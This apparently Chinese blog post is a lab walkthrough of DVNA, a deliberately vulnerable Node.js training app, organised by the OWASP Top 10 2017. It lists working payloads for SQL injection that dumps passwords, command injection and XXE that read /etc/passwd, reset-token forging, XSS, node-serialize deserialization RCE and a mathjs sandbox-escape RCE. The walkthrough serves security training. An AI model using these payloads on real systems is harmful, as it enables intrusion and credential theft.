Dvna for Owasp top 10 2017

简介:

DVNA(Damn Vulnerable Node Application),它是一款由Node.js打造的知名WEB漏洞测试平台,或许有些朋友已经使用过。它是用来给使用Node的WEB开发人员演示如何进行安全编码,以及让网络安全爱好者进行夺旗比赛的平台。其中,这个平台里包含常见的WEB漏洞,并且分级成不同层次

安装:

https://github.com/konceptz/DVNA

hacking:

A1 Injection

SQL Injection

http://127.0.0.1:9090/app/usersearch

 

Payloads:

'

' or '1'='1

'or''='

当前用户信息和数据库版本信息查询

payload:

' union select version(),1 from information_schema.tables -- //

查询账户密码:

payload:

 ' UNION SELECT password,login from Users -- //

 

 

Command Injection

 

Payloads:

8.8.8.8 && cat /etc/passwd && id

hha || id

 

A2 Broken authentication

 

重置密码接口地址

http://127.0.0.1:9090/resetpw?login=<username>&token=<md5(username)>

echo -n 'admin' | md5sum

可以重置任意用户的密码

 

A3 Sensitive data exposure

 

http://127.0.0.1:9090/app/admin/users

A4 XML external entities

 

Paylaod:

<!DOCTYPE foo [<!ELEMENT foo ANY >

<!ENTITY bar SYSTEM "file:///etc/passwd" >]>

<products>

   <product>

      <name>Playstation 4</name>

      <code>274</code>

      <tags>gaming console</tags>

      <description>&bar;</description>

   </product>

</products>

 

以上内容保存成*.xml 格式的文件

A5 broken access control

 

http://127.0.0.1:9090/app/useredit

此接口可以更改任意用户的密码,只需要提供账户和邮箱地址即可

对UID没有判断,可以控制UID来修改任意用户的密码

 

A6 security misconfiguration

 

泄露网站的物理路径

 

A7 cross-site scripting

 

Reflected XSS in Search Query

payloads

<script>alert('Cookie:'+document.cookie)</script>

'><script>alert(document.cookie)</script>
 ='><script>alert(document.cookie)</script>
 <script>alert(document.cookie)</script>
 <script>alert(vulnerable)</script>

 

 

Stored XSS in Product Listing

只要浏览到此页面就会触发XSS 漏洞

DOM XSS in user listing

 

A8 insecure deseriliaztion

Payload:

{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('id;cat /etc/passwd', function(error, stdout, stderr) { console.log(stdout) });}()"}

 

 

A9 Using Components with Known Vulnerabilities

 

mathjs Remote Code Execution

Payload:

cos.constructor("spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}console.log(a);var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!=='buffer')for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;}")();cos.constructor("return spawnSync('id').output[1]")()

 

 

A10 Insufficient Logging and Monitoring

参考

https://appsecco.com/books/dvna-developers-security-guide/

https://github.com/appsecco/dvna

 

 

posted @ 2019-02-16 10:33  APT-101  阅读(658)  评论(1编辑  收藏  举报